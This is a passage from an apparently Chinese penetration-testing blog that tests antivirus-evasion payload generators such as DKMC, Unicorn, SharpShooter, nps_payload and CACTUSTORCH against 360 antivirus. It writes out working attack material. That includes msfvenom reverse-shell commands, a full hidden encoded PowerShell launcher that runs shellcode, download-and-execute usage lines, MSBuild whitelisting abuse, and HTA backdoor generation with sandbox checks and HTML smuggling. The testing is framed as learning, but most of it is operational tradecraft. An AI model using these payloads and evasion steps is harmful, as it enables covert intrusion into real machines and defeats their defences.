<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212182138145.png" alt="image-20220212182138145"></p>
<p><code>Select path</code>选择存放路径</p>
<p><code>Injection Techniques</code>选择注入技术，这里用了第二个注入Notepad++</p>
<p><code>Generate Exe</code>生成可执行文件</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212183258116.png" alt="image-20220212183258116"></p>
<p>360全家桶第一次静态查杀没有反应，但是过了一会就被360杀毒删除隔离了</p>
<p>动态直接被查杀</p>
<h3 id="小结-4"><a href="#小结-4" class="headerlink" title="小结"></a>小结</h3><p>工具简单，使用便捷。免杀效果不如以前了，作者官方说明文件中也说了，随着工具的流行，工具也长期没有更新，效果确实越来越差了。但是作者提出了一种思路，就是对生成的可执行文件使用C#混淆器，后续可以尝试下</p>
<h2 id="DKMC"><a href="#DKMC" class="headerlink" title="DKMC"></a>DKMC</h2><p>DKMC是⼀种⽣成混淆的shellcode的⼯具，并把shellcode合成到图像⽂件中，最终依靠PowerShell执⾏最终的shellcode</p>
<h3 id="安装-5"><a href="#安装-5" class="headerlink" title="安装"></a>安装</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">git clone https://github.com/Mr-Un1k0d3r/DKMC</span><br></pre></td></tr></table></figure>

<h3 id="使用-5"><a href="#使用-5" class="headerlink" title="使用"></a>使用</h3><p><code>python dkmc.py</code>运行DKMC，参数解释</p>
<blockquote>
<p>[*] (gen) 将msf的shellcode注入到一个BMP图像</p>
<p>[*] (web) 启动web服务用来分发BMP图像</p>
<p>[*] (ps) 生成ps的payload</p>
<p>[*] (sc) 将msf生成的raw文件转为shellcode</p>
<p>[*] (exit) 退出</p>
</blockquote>
<p>执行流程如下：</p>
<ol>
<li>用msf生成raw文件</li>
<li>将msf生成的raw文件转为shellcode</li>
<li>将shellcode注入到BMP图像中</li>
<li>生成powershell payload</li>
<li>用web服务分发BMP文件</li>
</ol>
<h4 id="第一步"><a href="#第一步" class="headerlink" title="第一步"></a>第一步</h4><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.221.128 LPORT=4444 -e x86/shikata_ga_nai -b &quot;\x00&quot; -i 5 -a x86 -f raw -o /root/桌面/payload/payload12.raw</span><br></pre></td></tr></table></figure>

<h4 id="第二步"><a href="#第二步" class="headerlink" title="第二步"></a>第二步</h4><p><code>sc</code>设置``source为上一步生成的<code>payload12.raw</code>，生成shellcode，复制并<code>exit</code>返回主菜单</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212202336610.png" alt="image-20220212202336610"></p>
<h4 id="第三步"><a href="#第三步" class="headerlink" title="第三步"></a>第三步</h4><p><code>gen</code>设置shellcode为上一步中复制的内容，生成bmp并<code>exit</code>返回主菜单</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212202635077.png" alt="image-20220212202635077"></p>
<h4 id="第四步"><a href="#第四步" class="headerlink" title="第四步"></a>第四步</h4><p><code>ps</code>设置url为Kali地址，执行生成powershell脚本，复制脚本并<code>exit</code>返回主菜单</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212203218057.png" alt="image-20220212203218057"></p>
<figure class="highlight powershell"><table><tr><td class="code"><pre><span class="line">powershell.exe <span class="literal">-nop</span> <span class="literal">-w</span> <span class="keyword">hidden</span> <span class="literal">-enc</span> JABIAGEAcABiAEwAUgB0AFQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBDAEcAdQBvAEIAMgBJAEMALwB6AEUAMgBOAEQAUQAyAE4AagBrAHcATQB6AFUAdQBNAHoAWQAhAHYAVgBaAGQAVAArAE0ANABGAEgAMQBIADQAagA5AFkAbwAwAGgASgBwAEQAUwAwAEIAYgBFAHMAMABrAGkAVQBGAG8AYQBPAEsASABRAEkAUQA5AEYAMABxAHAARwBiADMARABZAGUAbgBEAGcANABUAHEARQBNAC8AUABlADkAegBnAGMAcABvAHUAeQB3AHUAOQBMAG0ASgBZAGwAOQByADMAMQA5AHoAdgBHAHgAagBTAC8AegBIAHIAMABtAEgAOABtAEIAdQBiAGsAeAB5ADIASgBmAE0AUgBHAFQAVwArADkAYQBmAGcAdABaAGQARQBwACsAYgBXADYAUQA4AGgAbABTAFMAUwBOAGkARwBRAHMAcQBmADAAUQBpAHkARABnADQASgBQADkASgBwAFAAIQBoAHkAQwBUAFkAZABiACEAeABEAFUALwBTADYAeABnAEgAdABzAGEAZABKAE8AbQBKAGkATABKADQAcwByAC8AZgB6AGEAUwBFAFcAQgBYAC8ANwBpAGQAUQBuAFQAUwBGAGEATQBvAFoAcABKAFoATgBIAHMAawBvAEIAIQBtAE4AOAArAGwAUAA4AEIAWAA1AFIAWQB3AGYANwBpAGMAdQBwAHAAUwBYAFkAYwBzAHUAOQBVAE0AZwBqAFUANABjADYATAA1AFQANABWAE4AZABzAE8AcwBsAG4AQwBuAEwALwBQADcAZAB0AE0AZQBOADEAcwBRADkAdQBzADAAbwBUAHkAMwBUAFcANgBZAEsASQBqAGYAZwAzAEwAVABKAGsANgAwAG4AdgBGAHcAbQBZAEoAawBEADUAawB1AFIAaQBwAGwAeQBSAHkAegBlAGIAcgB0AGYANAA1AFQATwA0ACEAeABIAFcAOAAhACEAVgBDAGkAQwAxAE0AVABsADEAIQB1AFMAbwBEAEkAWgBWACsAdgBTACEAeABWAGgAbABvAG0AZgBRADAAUwBnAEUAdwBRAFMAVQBzAHgAeQArAC8ARgBDADMASQBCAGwAeABCAG4AbgBEAGoAbQB3AHgAbQBVAFYARgAxAG0AcwBXACEAVABZAHIAMABDAEsAeAAhAE8ANQBZAEQANgBrADcAZwBtAE4AIQB3ADQAWABNAEoAdABZAFoAMwBCAFgATABmADYAOQBTAGQAWgBxAEUAawBZAE4AbABiAFEAZABwAEcAbAB0AG8AWQBPAGMAdAB5AEwAWAB0AEYAKwBYAHUAawBLAHUAagBjADgAcgBnAGgARwBTAEoANAAzAEsAcwAxAEwARQBSAFQAYQBhAHIAVgBGAEoAMwBWACEAOQA0ADcAdwBIAGMAQgBYAFcAVQBLAFEAcwB6AC8ANQBJAG0AZwA0AFoAWQBEAFYAVQBDAGIAbgBFAFgAKwBOAFMAWgBtAEIAUAB5AEYAaQB6AE4ASgA1AE0AaQBEAEcANgBTAHYAeABoADcAMwB3ADUAYwB0ADQANwBaAEsAdgBLAHgAKwB4AFkAZgAhAG0AeABhAFgAdwBsAFcARABDAHAAQgAzAGoAQgByAEsARQBZADEAegBGAHYAeQA3AFEASABNAHgAWgBEAGIAeABuAFQAaQBQAG0AVgBFAHEAMQAxAFoATQBHAE0AUQB3ADYATQBXADQAVwBkAFkAWQBHAFcAVwBYAFoAIQAwACEATQBPAGMANgBvADAAKwAhADQAWgB2ADAANAA3AGkAcABoADYAegBqADMATQBHACEAOQAhAGQAbgB3AGsAUABNAFcAcQBVACEAdgAyAHkAMgBJAEsAUABpADIAegBIAHcAOABnAFEAZwBpAEwAZgB4AE4ANQBtADYASAArAG8AWQBvAHUATgBiACsAcwBaAHQAZgAvAEcARwBSADIATwBVADEAVABoAHcAdwB6ADMASQBDACsAUQB6AHkAZwBIACEASwBIAGQATwBLAFUAbABWADIAZABUAEkAbgA4ADAANgB6AEwASABXAFIAYwBNAFoAKwBtAHEAaABwAHUAWQByADkARQBzADUAeQAxAEsAKwBKAFUAeQBjAHgASABiAGgARwBCAFMAeQA4AEIAbgAxAEcAdQAhAFgASABJAEMAUQB2AGcAYwBPAG0AeABlAFQAVwA3AHUAUgBhAE8ATAB1AFcAYwB4AFgATQBjAGEAWQBGADAAWQBJAHUARwB3AFYATgBhAE0AUgBJAEwAcgBkAFYAaAB1AHgANgBvAGYAcABSAHcAaQBEACEAdwBOADQAVgBqAFQAdQBkAG8AIQBlAFUARwB5AG4AVgBHADUAeABDAFkANgA0AHUAdABOAGsAbQB4AEkAegBRADQARgBTAG8AcgBwAFMATABqAEgAaABmAEsASQBWAGQATQBLAG4AUQBZAEQAYgBTAFcAMgBIACsAdgBwAEwASQBYAFgAVgBCAFgAUQBzAG0AUgBWAGUAeQAzAEMAcABnAHoAUQBMAHUAQwA2AFEAWABjAFoAcAAhAHEAUgAhAEoATABwADAAZwBHAHQAcQBFAEQAMwBTADkAMQBaAHEAQgB4AFEAdQA2ADEAbwBsAGYAUwA2AHAANwBjAFEAZQB2AGMAbABSAFMAYwA2AEgAQwBwADkATABZAHoAVAByADMAdwArAHUANwB6AHcANAAzADIANwA5AGMAeQBMACsAdgBvAG8AbQB2AEgAQwBqAFUAbQA3AG0ASQB1AGEATgBDAGoAaQBsAG8AZgBRAHEAVwBTAC8AYQAyAHQAMQBwADkAdAB0ADcAVwA3ADUANwBiAGIATABiAGYAVgAzAHQAcwBTAG0AVQBvAHkAMQBXAGoAdAA3AHUAegBzADcAdQA3ADkAcwBkADEAMABwADEASAB5AEkAZAArAEkAQgB2AFYAdgB3AHAAdQBWAGcAdAAvAHkAdgAhAEcAVgBhAFUAZwA1AEYAbwA5AFcAVgBvAG4AdgBXAE0AagBqADAAbwAyAEcAZwB1AGsATQB5ADYAcgBQAHIAeAB1AFEATQBYACEAMABlAEQAdwBDAEsAdABZADYAbgAhAHQAZgBlADIAUgBoAFgAbQBqAFEAaABXADEATwBVAEkASgBmADgAWABPADcAdgBmAGIATABKAHMAKwBCAGQAbQAyAGQAVgBkAFAAKwAvAGoAZQBzAEYAWQBWAFEAUQBlAGUAZQBRAGoAeABYAG8AZABPADgAMwAyADQAMgAwAGUAYQBhADkAegB0AE4AdQArAGIAeQA5ADIAdgBzAGkAbQBSAHAAUABRAC8AbgBhAEsAcwBzAGsARgBxAGQAaABPAGUAVABGAEQAIQB1AC8ASAA3AG4ANABYACsAIQBzAGQAUgBuAGkASwAvAGcAdAB6AEQAVwBiAFgALwBUACsAeQA1AG8AbQAwADYANQAvAEYAZgB0AEwAeAB2ACsARQBjAGoALwBEAG8ARQBSAFoAUQByAEQAUABiAFEAbQBEAHMAWABlAGUAIQBPAEkAVQBqAG8AcgBSADIAMwBPAEUAcQBwAGkAVgBqADcANgAxAG4ATwBPAE8AKwBNAE0AagArAEQATgBEAGYATgAhAFUAOQBtAGYAawBaAFgAVgBwACsAdwBCAHIAegB4AHcAUwAvAGIAcwAxAFoATQAyAFYAVgBTAHEAeABrADgAeAB4AFgAdABTAG8AZwA5AEMAeQArAGkAeQBoAFUAMwA2AFIAOQBkAEUAZgA1AEUAbgAwAGsAIQAhAE8AdQBsADIARwB5ADkATQBjAHAANQBwAFAAeQBKAEcAYwBlAEYANwBKAEgAZQA0AGgAagB6ADcAawBWAHkAIQBEADMAagB2AGEAWAB3AFcAMAA5AHgAdgAhAEkAKwBPADEAWgBuAHkARQBmAE8AOAB2AFAAcwB2AGEAYQBvAFoARwBUAFEASwAhACEAIQA9ACIALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAgACIAQQAiACkAKQApADsAIAAkAHIAVQBlAFIAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQASABhAHAAYgBMAFIAdABUACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAIABbAFMAYwByAGkAcAB0AEIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACQAcgBVAGUAUgApAC4ASQBuAHYAbwBrAGUAKAApAAoA</span><br></pre></td></tr></table></figure>



<h4 id="第五步"><a href="#第五步" class="headerlink" title="第五步"></a>第五步</h4><p><code>web</code>直接<code>run</code>，此时Win7已经可以通过上一步的url下载图片了</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212203907952.png" alt="image-20220212203907952"></p>
<h3 id="运行效果"><a href="#运行效果" class="headerlink" title="运行效果"></a>运行效果</h3><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212204141231.png" alt="image-20220212204141231"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212204501644.png" alt="image-20220212204501644"></p>
<p>360全家桶对bmp图片进行扫描没有问题，但是执行ps脚本会警告</p>
<h3 id="小结-5"><a href="#小结-5" class="headerlink" title="小结"></a>小结</h3><p>DKMC通过把shellcode注入到bmp文件中再利用powershell来执行，虽然图片没有被查杀但是powershell的行为容易被杀软注意到，后续可以对ps代码进行混淆来进一步利用</p>
<h2 id="Unicorn"><a href="#Unicorn" class="headerlink" title="Unicorn"></a>Unicorn</h2><h3 id="安装-6"><a href="#安装-6" class="headerlink" title="安装"></a>安装</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">git clone https://github.com/trustedsec/unicorn.git</span><br></pre></td></tr></table></figure>

<h3 id="用法"><a href="#用法" class="headerlink" title="用法"></a>用法</h3><p>可生成ps1、macro、hta、dde等代码和文件</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Usage: python unicorn.py payload reverse_ipaddr port &lt;optional hta or macro, crt&gt;</span><br><span class="line">PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443</span><br><span class="line">PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe</span><br><span class="line">PS Down/Exec Macro: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe macro</span><br><span class="line">Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro</span><br><span class="line">Macro Example CS: python unicorn.py &lt;cobalt_strike_file.cs&gt; cs macro</span><br><span class="line">HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta</span><br><span class="line">HTA SettingContent-ms Metasploit: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 ms</span><br><span class="line">HTA Example CS: python unicorn.py &lt;cobalt_strike_file.cs&gt; cs hta</span><br><span class="line">HTA Example SettingContent-ms: python unicorn.py &lt;cobalt_strike_file.cs cs ms</span><br><span class="line">HTA Example SettingContent-ms: python unicorn.py &lt;patth_to_shellcode.txt&gt;: shellcode ms</span><br><span class="line">DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde</span><br><span class="line">CRT Example: python unicorn.py &lt;path_to_payload/exe_encode&gt; crt</span><br><span class="line">Custom PS1 Example: python unicorn.py &lt;path to ps1 file&gt;</span><br><span class="line">Custom PS1 Example: python unicorn.py &lt;path to ps1 file&gt; macro 500</span><br><span class="line">Cobalt Strike Example: python unicorn.py &lt;cobalt_strike_file.cs&gt; cs (export CS in C# format)</span><br><span class="line">Custom Shellcode: python unicorn.py &lt;path_to_shellcode.txt&gt; shellcode (formatted 0x00 or metasploit)</span><br><span class="line">Custom Shellcode HTA: python unicorn.py &lt;path_to_shellcode.txt&gt; shellcode hta (formatted 0x00 or metasploit)</span><br><span class="line">Custom Shellcode Macro: python unicorn.py &lt;path_to_shellcode.txt&gt; shellcode macro (formatted 0x00 or metasploit)</span><br><span class="line">Generate .SettingContent-ms: python unicorn.py ms</span><br><span class="line">Help Menu: python unicorn.py --help</span><br></pre></td></tr></table></figure>

<h3 id="使用-6"><a href="#使用-6" class="headerlink" title="使用"></a>使用</h3><p>生成payload</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">python unicorn.py windows/meterpreter/reverse_https 192.168.221.128 4444</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212211144925.png" alt="image-20220212211144925"></p>
<p>生成<code>powershell_attack.txt</code>和<code>unicorn.rc</code></p>
<p>直接用<code>msfconsole -r unicorn.rc</code>快速启动MSF</p>
<p>在目标机执行powershell脚本</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212211726185.png" alt="image-20220212211726185"></p>
<p>360直接阻止powershell运行了</p>
<h3 id="小结-6"><a href="#小结-6" class="headerlink" title="小结"></a>小结</h3><p>可生成代码多样，但是不经过混淆直接使用很难免杀</p>
<h2 id="Python-Rootkit"><a href="#Python-Rootkit" class="headerlink" title="Python-Rootkit"></a>Python-Rootkit</h2><p>（待补）</p>
<h2 id="ASWCrypter"><a href="#ASWCrypter" class="headerlink" title="ASWCrypter"></a>ASWCrypter</h2><p>该工具使用python脚本对hta代码进行编码处理，生成新的hta后门</p>
<h3 id="安装-7"><a href="#安装-7" class="headerlink" title="安装"></a>安装</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">git clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.git</span><br></pre></td></tr></table></figure>

<h3 id="使用-7"><a href="#使用-7" class="headerlink" title="使用"></a>使用</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">chmod +x ASWCrypter.sh</span><br><span class="line">./ASWCrypter.sh</span><br></pre></td></tr></table></figure>

<p>选择<code>G</code>，generate</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212215442859.png" alt="image-20220212215442859"></p>
<p>配置LHOST、LPORT</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212215316449.png" alt="image-20220212215316449"></p>
<p>如果生成payload时报错可以<code>mkdir output</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212215104051.png" alt="image-20220212215104051"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212215908266.png" alt="image-20220212215908266"></p>
<p>执行被360安全卫士警告</p>
<h3 id="小结-7"><a href="#小结-7" class="headerlink" title="小结"></a>小结</h3><p>静态免杀效果不错，但是调用powershell的行为会被警告</p>
<h2 id="nps-payload"><a href="#nps-payload" class="headerlink" title="nps_payload"></a>nps_payload</h2><p><code>nps_payload</code>可以⽣成基于msbuild的xml⽂件和独⽴执⾏的hta⽂件，并对xml⽂件和hta⽂件做了⼀定的混淆免杀，以达到免杀目的</p>
<h3 id="安装-8"><a href="#安装-8" class="headerlink" title="安装"></a>安装</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">git clone https://github.com/trustedsec/nps_payload</span><br><span class="line">pip install -r requirements.txt</span><br></pre></td></tr></table></figure>

<h3 id="使用-8"><a href="#使用-8" class="headerlink" title="使用"></a>使用</h3><p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212221042746.png" alt="image-20220212221042746"></p>
<p>只需要使用<code>msbuild_nps.xml</code></p>
<p>需要用<code>msbuild.exe</code>，<code>msbuild.exe</code>在windows中的一般路径<code>C:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe</code></p>
<p>Windows</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe msbuild_nps.xml</span><br></pre></td></tr></table></figure>

<p>Kali</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfconsole -r msbuild_nps.rc</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212225126509.png" alt="image-20220212225126509"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212221714694.png" alt="image-20220212221714694"></p>
<p>动静态均未被查杀</p>
<h3 id="小结-8"><a href="#小结-8" class="headerlink" title="小结"></a>小结</h3><p>基于白名单程序<code>msbuild.exe</code>执行payload，同时<code>nps_payload</code>对生成的文件进行了混淆，两者结合免杀效果确实强力</p>
<h2 id="HERCULES"><a href="#HERCULES" class="headerlink" title="HERCULES"></a>HERCULES</h2><p>（安装问题，待补）</p>
<h2 id="SpookFlare"><a href="#SpookFlare" class="headerlink" title="SpookFlare"></a>SpookFlare</h2><h3 id="安装-9"><a href="#安装-9" class="headerlink" title="安装"></a>安装</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">git clone https://github.com/hlldz/SpookFlare.gitpip install -r requirements.txt</span><br></pre></td></tr></table></figure>

<h3 id="使用-9"><a href="#使用-9" class="headerlink" title="使用"></a>使用</h3><p>直接<code>python spookflare.py</code>执行</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212230929914.png" alt="image-20220212230929914"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212231102345.png" alt="image-20220212231102345"></p>
<blockquote>
<p>支持四种payload</p>
<ol>
<li>msf的exe程序(自编译)</li>
<li>msf的ps1脚本(免杀混淆)</li>
<li>hta</li>
<li>office宏代码</li>
</ol>
</blockquote>
<p><code>info</code>可以查看需要配置的参数</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212232114869.png" alt="image-20220212232114869"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212232546093.png" alt="image-20220212232546093"></p>
<p>参数配置完毕以后生成C#文件，需要用<code>csc.exe</code>编译成exe</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe xxxx.cs</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212232815419.png" alt="image-20220212232815419"></p>
<p>360全家桶第一次扫描没有查杀，过了一会被360杀毒查杀</p>
<h3 id="小结-9"><a href="#小结-9" class="headerlink" title="小结"></a>小结</h3><p>SpookFlare会对每次生成的payload进行代码混淆处理来增加免杀概率，exe文件免杀效果一般，hta可过静态查杀</p>
<h2 id="SharpShooter"><a href="#SharpShooter" class="headerlink" title="SharpShooter"></a>SharpShooter</h2><p>SharpShooter是武器化的Payload生成框架，支持反沙箱分析、分阶段和无阶段的Payload执行，并能够规避入口监测。</p>
<h3 id="安装-10"><a href="#安装-10" class="headerlink" title="安装"></a>安装</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">git clone https://github.com/mdsecactivebreach/SharpShooter</span><br><span class="line">pip install -r requirements.txt</span><br></pre></td></tr></table></figure>

<h3 id="使用-10"><a href="#使用-10" class="headerlink" title="使用"></a>使用</h3><p>执行<code>python SharpShooter.py -h</code></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220212233613004.png" alt="image-20220212233613004"></p>
<blockquote>
<p> -h, <em>–help</em> 帮助菜单</p>
<p> <em>–stageless</em> 创建一个不分阶段的<em>payload</em></p>
<p> <em>–dotnetver <ver></em> 制定<em>dotnet</em>的版本，<em>2</em>或者<em>4</em></p>
<p> <em>–com <com> COM</em> 分阶段技术*:* 如<em>outlook, shellbrowserwin,</em></p>
<p> <em>wmi, wscript, xslremote</em>等</p>
<p> <em>–awl <awl></em> 使用程序白名单技术*: wmic, regsvr32*</p>
<p> <em>–awlurl <awlurl></em> 指定取回 <em>XSL/SCT payload</em>的<em>url</em>地址</p>
<p> <em>–payload <format> Payload</em> 类型*: hta, js, jse, vbe, vbs, wsf,*</p>
<p> <em>macro, slk</em></p>
<p> <em>–sandbox <types></em> 绕过沙盒技术*:*</p>
<p> [1] Key <strong>to Domain</strong> (e.g. 1=CONTOSO)</p>
<p> [2] Ensure <strong>Domain</strong> Joined</p>
<p> [3] <strong>Check for</strong> Sandbox Artifacts</p>
<p> [4] <strong>Check for</strong> Bad MACs</p>
<p> [5] <strong>Check for</strong> Debugging</p>
<p> <em>–amsi <amsi></em> 使用<em>AMSI</em>绕过技术*: amsienable*</p>
<p> <em>–delivery <type></em> 分发方法*: web, dns, both*</p>
<p> <em>–rawscfile <path></em> 指定生成<em>payload</em>的<em>shellcode</em></p>
<p> <em>–shellcode</em> 使用内置的<em>shellcode</em></p>
<p> <em>–scfile <path></em> 指定<em>C#<em>的</em>shellcode</em>的路径</p>
<p> <em>–refs <refs></em> 指定<em>C#<em>需要的依赖文件，如</em>mscorlib.dll</em>等</p>
<p> <em>–namespace <ns></em> 指定<em>C#<em>的</em>Namespace</em>，如<em>Foo.bar</em></p>
<p> <em>–entrypoint <ep></em> 指定<em>C#<em>需要执行的方法，如</em>Main</em></p>
<p> <em>–web <web></em> 指定<em>web</em>分发的地址</p>
<p> <em>–dns <dns></em> 指定<em>Dns</em>分发的地址</p>
<p> <em>–output <output></em> 输出文件的名称</p>
<p> <em>–smuggle HTML</em>内的隐藏文件</p>
<p> <em>–template <tpl></em> 指定生成<em>html</em>的<em>template</em>文件 <em>(e.g. mcafee)</em></p>
</blockquote>
<p>官方文档里提供了各种payload的生成命令，使用前可以查看一下</p>
<p>接下来尝试创建一个hta后门</p>
<p>msfvenom生成shellcode</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=192.168.221.128 LPORT=4444 -f raw -o shellcode.txt</span><br></pre></td></tr></table></figure>

<h4 id=""><a href="#" class="headerlink" title=""></a></h4><p>用SharpShooter创建hta后门</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./shellcode.txt --sandbox 4 --smuggle --template mcafee</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220215151041983.png" alt="image-20220215151041983"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220215151355065.png" alt="image-20220215151355065"></p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220215151612441.png" alt="image-20220215151612441"></p>
<p>运行被查杀</p>
<h3 id="小结-10"><a href="#小结-10" class="headerlink" title="小结"></a>小结</h3><p>这个框架比较复杂，功能强大。在本次测试只是简单的使用了其中的一些功能，免杀效果比较一般，可能是比较出名或者太老了，但是默认生成的payload还可以用其他的方法进行进一步免杀后效果应该会有所提升</p>
<p>资料：<a href="https://www.anquanke.com/post/id/100533">https://www.anquanke.com/post/id/100533</a></p>
<h2 id="CACTUSTORCH"><a href="#CACTUSTORCH" class="headerlink" title="CACTUSTORCH"></a>CACTUSTORCH</h2><h3 id="安装-11"><a href="#安装-11" class="headerlink" title="安装"></a>安装</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">git clone https://github.com/mdsecactivebreach/CACTUSTORCH</span><br></pre></td></tr></table></figure>

<h3 id="使用-11"><a href="#使用-11" class="headerlink" title="使用"></a>使用</h3><p>先用MSF或者CS生成一个32位shellcode并用base64编码</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=192.168.221.128 LPORT=4444 -f raw -o payload.bin</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220215152616661.png" alt="image-20220215152616661"></p>
<p>复制Base64编码后的shellcode到CACTUSTORCH.js中的<code>code</code>部分</p>
<p>PS：上面的<code>binary</code>参数也可以替换，例如：计算器（calc.exe）</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220215152829223.png" alt="image-20220215152829223"></p>
<p>目标机执行</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">wscript.exe CACTUSTORCH.js</span><br></pre></td></tr></table></figure>

<p>执行被360杀毒拦截</p>
<h3 id="小结-11"><a href="#小结-11" class="headerlink" title="小结"></a>小结</h3><p>本工具和上一个测试的开发者相同，测试效果不太行，但是同样的可以尝试对脚本2代码进行二次免杀来提高免杀能力</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>本篇多各种免杀工具进行了学习，并没有把所有功能都一一尝试过去，安装过程中出现的各种奇奇怪怪的问题总是令人抓狂，查了一堆文章水平也是参差不齐，过程有时枯燥有时免杀成功又会非常兴奋，总的来说还是有收获的</p>
<p>杀软在不断更新迭代，免杀技术也在不断进步创新，两者在互相碰撞中发展，通过使用不断出现的免杀工具，学习工具免杀的原理和思路，也是了解免杀技术发展的一种方法</p>
<p>最后，安装问题出现的工具后续有空会补上</p>
]]></content>
      <tags>
        <tag>渗透测试</tag>
        <tag>免杀</tag>
      </tags>
  </entry>
  <entry>
    <title>面经</title>
    <url>/2022/03/04/%E9%9D%A2%E7%BB%8F/</url>
    <content><![CDATA[<div class="hbe hbe-container" id="hexo-blog-encrypt" data-wpm="抱歉, 这个密码看着不太对" data-whm="抱歉, 这个文章不能被校验, 不过您还是能看看解密后的内容.">
